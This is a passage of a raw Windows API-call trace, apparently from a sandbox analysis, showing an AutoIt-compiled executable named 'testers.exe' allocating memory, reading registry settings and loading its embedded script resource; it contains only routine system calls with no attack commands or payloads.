[0270.206] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0270.207] GetProcAddress (hModule=0x75990000, lpProcName="GetNativeSystemInfo") returned 0x759b10b5 [0270.207] GetNativeSystemInfo (in: lpSystemInfo=0x8ffbf4 | out: lpSystemInfo=0x8ffbf4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0270.207] FreeLibrary (hLibModule=0x75990000) returned 1 [0270.208] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.208] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xcd3300 [0270.208] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3318 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce4038 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3330 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce4048 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3348 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce4058 [0270.209] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3360 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce4068 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3378 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce4078 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3390 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5088 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd33a8 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce50b0 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd33c0 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce50c0 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd33d8 [0270.209] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce50d0 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd33f0 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce50e0 [0270.210] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0270.210] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0270.210] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0270.210] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0270.210] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0270.210] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3408 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce50f0 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce54b0 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5100 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce54c8 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5110 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce54e0 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5120 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce54f8 [0270.210] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5130 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5510 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5140 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5528 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5150 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5540 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5160 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5558 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5170 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5570 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5180 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5190 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5588 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce51a0 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce55a0 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce51b0 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce55b8 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce51c0 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce55d0 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce51d0 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce55e8 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce51e0 [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce51f0 [0270.211] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0270.211] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5600 [0270.212] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5200 [0270.212] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xcd2288 [0270.212] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0270.212] OleInitialize (pvReserved=0x0) returned 0x0 [0270.228] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.228] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5618 [0270.228] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5220 [0270.228] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x8ffbfc | out: phkResult=0x8ffbfc*=0xf8) returned 0x0 [0270.230] RegQueryValueExW (in: hKey=0xf8, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x8ffc18, lpcbData=0x8ffc00*=0x8 | out: lpType=0x0, lpData=0x8ffc18*=0x30, lpcbData=0x8ffc00*=0x4) returned 0x0 [0270.230] RegCloseKey (hKey=0xf8) returned 0x0 [0270.230] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6390 [0270.230] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5230 [0270.230] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5240 [0270.230] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5250 [0270.231] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.231] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5648 [0270.231] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5260 [0270.231] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce63b8 [0270.231] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5270 [0270.231] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5660 [0270.231] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5280 [0270.231] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5678 [0270.231] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5290 [0270.231] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5690 [0270.231] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce52a0 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce56a8 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce52b0 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce56c0 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce52c0 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce56d8 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce52d0 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce56f0 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce52e0 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5708 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce52f0 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5720 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5300 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5738 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5310 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5750 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5320 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5768 [0270.232] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5330 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5780 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5340 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5798 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5350 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce57b0 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5360 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce57c8 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5370 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce57e0 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5380 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce57f8 [0270.233] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5390 [0270.233] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.234] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.239] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5810 [0270.239] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53a0 [0270.242] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8dfbd0, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0270.242] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x50) returned 0xcea578 [0270.242] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53b0 [0270.245] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8cfbc0, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0270.246] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce5810 | out: hHeap=0xcc0000) returned 1 [0270.246] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x50) returned 0xcea5d0 [0270.246] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea578 | out: hHeap=0xcc0000) returned 1 [0270.246] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce53b0 | out: hHeap=0xcc0000) returned 1 [0270.246] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8dfbdc, lpFilePart=0x8efbdc | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x8efbdc*="testers.exe") returned 0x20 [0270.247] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce63e0 [0270.247] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5810 [0270.247] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5828 [0270.247] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53b0 [0270.247] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x8efbf8 | out: phkResult=0x8efbf8*=0x0) returned 0x2 [0270.247] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce5828 | out: hHeap=0xcc0000) returned 1 [0270.247] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce53b0 | out: hHeap=0xcc0000) returned 1 [0270.247] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.248] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.249] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.249] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5828 [0270.249] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53b0 [0270.249] RtlSizeHeap (HeapHandle=0xcc0000, Flags=0x0, MemoryPointer=0xce3138) returned 0x80 [0270.249] IsThemeActive () returned 0x1 [0270.250] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x8ffc1c, fWinIni=0x0 | out: pvParam=0x8ffc1c) returned 1 [0270.250] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 1 [0270.250] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5840 [0270.250] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53c0 [0270.250] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x8efbf0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0270.250] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5858 [0270.250] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53d0 [0270.250] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8cfb50, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0270.250] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x50) returned 0xcea578 [0270.250] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53e0 [0270.252] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8bfb40, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0270.252] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcd3348 | out: hHeap=0xcc0000) returned 1 [0270.252] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x50) returned 0xcea628 [0270.252] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea578 | out: hHeap=0xcc0000) returned 1 [0270.252] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce53e0 | out: hHeap=0xcc0000) returned 1 [0270.252] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xcd22d0 [0270.252] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53e0 [0270.252] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0270.253] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0270.253] Wow64DisableWow64FsRedirection (in: OldValue=0x8dfb54 | out: OldValue=0x8dfb54*=0x0) returned 1 [0270.253] FreeLibrary (hLibModule=0x75990000) returned 1 [0270.253] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xcea578 [0270.253] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8df9f0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0270.254] GetFileType (hFile=0xf8) returned 0x1 [0270.254] LoadLibraryExW (lpLibFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0270.254] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0270.255] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0270.255] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0270.255] FreeLibrary (hLibModule=0x75990000) returned 1 [0270.255] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10000) returned 0xcea680 [0270.256] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53f0 [0270.256] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x8dfbb0 | out: ppstm=0x8dfbb0*=0xce6430) returned 0x0 [0270.257] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0270.257] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0270.257] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0270.257] LockResource (hResData=0x3607b8) returned 0x3607b8 [0270.257] ISequentialStream:RemoteWrite (in: This=0xce6430, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0270.259] IStream:RemoteSeek (in: This=0xce6430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0270.259] IStream:RemoteSeek (in: This=0xce6430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0270.259] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0xcea680, cb=0x18, pcbRead=0x8dfadc | out: pv=0xcea680*=0xa3, pcbRead=0x8dfadc*=0x18) returned 0x0 [0270.259] IStream:RemoteSeek (in: This=0xce6430, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0270.259] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0x8dfb20, cb=0x4, pcbRead=0x8dfadc | out: pv=0x8dfb20*=0x45, pcbRead=0x8dfadc*=0x4) returned 0x0 [0270.259] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce53f0 | out: hHeap=0xcc0000) returned 1 [0270.259] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcea680 | out: hHeap=0xcc0000) returned 1 [0270.259] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0x8dfb44, cb=0x10, pcbRead=0x8dfb1c | out: pv=0x8dfb44*=0x4d, pcbRead=0x8dfb1c*=0x10) returned 0x0 [0270.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8dfa18 | out: lpSystemTimeAsFileTime=0x8dfa18*(dwLowDateTime=0x42716ad0, dwHighDateTime=0x1d661be)) [0270.259] IStream:RemoteSeek (in: This=0xce6430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0270.259] IStream:RemoteSeek (in: This=0xce6430, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0270.259] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0x8df498, cb=0x4, pcbRead=0x8df25c | out: pv=0x8df498*=0x6b, pcbRead=0x8df25c*=0x4) returned 0x0 [0270.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8df158 | out: lpSystemTimeAsFileTime=0x8df158*(dwLowDateTime=0x427191e0, dwHighDateTime=0x1d661be)) [0270.260] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0x8df4a0, cb=0x4, pcbRead=0x8df25c | out: pv=0x8df4a0*=0xa6, pcbRead=0x8df25c*=0x4) returned 0x0 [0270.260] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0x8df288, cb=0x34, pcbRead=0x8df25c | out: pv=0x8df288*=0xe1, pcbRead=0x8df25c*=0x34) returned 0x0 [0270.260] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8df158 | out: lpSystemTimeAsFileTime=0x8df158*(dwLowDateTime=0x427191e0, dwHighDateTime=0x1d661be)) [0270.260] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0x8df4a0, cb=0x4, pcbRead=0x8df25c | out: pv=0x8df4a0*=0x17, pcbRead=0x8df25c*=0x4) returned 0x0 [0270.260] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0x8df4cc, cb=0x6e, pcbRead=0x8df25c | out: pv=0x8df4cc*=0xf9, pcbRead=0x8df25c*=0x6e) returned 0x0 [0270.260] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8df158 | out: lpSystemTimeAsFileTime=0x8df158*(dwLowDateTime=0x427191e0, dwHighDateTime=0x1d661be)) [0270.260] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0x8dfb53, cb=0x1, pcbRead=0x8df4a4 | out: pv=0x8dfb53*=0x0, pcbRead=0x8df4a4*=0x1) returned 0x0 [0270.260] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0x8dfb4c, cb=0x4, pcbRead=0x8df4a4 | out: pv=0x8dfb4c*=0xbc, pcbRead=0x8df4a4*=0x4) returned 0x0 [0270.260] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0x8dfb4c, cb=0x4, pcbRead=0x8df4a4 | out: pv=0x8dfb4c*=0xbc, pcbRead=0x8df4a4*=0x4) returned 0x0 [0270.260] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0x8dfb4c, cb=0x4, pcbRead=0x8df4a4 | out: pv=0x8dfb4c*=0x84, pcbRead=0x8df4a4*=0x4) returned 0x0 [0270.260] IStream:RemoteSeek (in: This=0xce6430, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0270.260] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1) returned 0xce53f0 [0270.260] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x1) returned 0xce5400 [0270.260] ISequentialStream:RemoteRead (in: This=0xce6430, pv=0xce5400, cb=0x0, pcbRead=0x8df4a4 | out: pv=0xce5400*=0x6e, pcbRead=0x8df4a4*=0x0) returned 0x0 [0270.260] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8df3a0 | out: lpSystemTimeAsFileTime=0x8df3a0*(dwLowDateTime=0x427191e0, dwHighDateTime=0x1d661be)) [0270.260] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce53f0 | out: hHeap=0xcc0000) returned 1 [0270.260] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce5400 | out: hHeap=0xcc0000) returned 1 [0270.260] CloseHandle (hObject=0xf8) returned 1 [0270.261] IUnknown:Release (This=0xce6430) returned 0x0 [0270.261] FreeLibrary (hLibModule=0x290000) returned 1 [0270.261] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcd22d0 | out: hHeap=0xcc0000) returned 1 [0270.261] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce53e0 | out: hHeap=0xcc0000) returned 1 [0270.261] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcd3318 | out: hHeap=0xcc0000) returned 1 [0270.261] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x50) returned 0xcea680 [0270.261] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3318 [0270.261] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6430 [0270.261] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce53e0 [0270.261] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce6458 [0270.261] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3348 [0270.261] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xce5400 [0270.261] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcd3348 | out: hHeap=0xcc0000) returned 1 [0270.261] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xce64a8 [0270.261] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xcd3348 [0270.261] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xce5870 [0270.261] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xce6430 | out: hHeap=0xcc0000) returned 1 [0270.261] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, 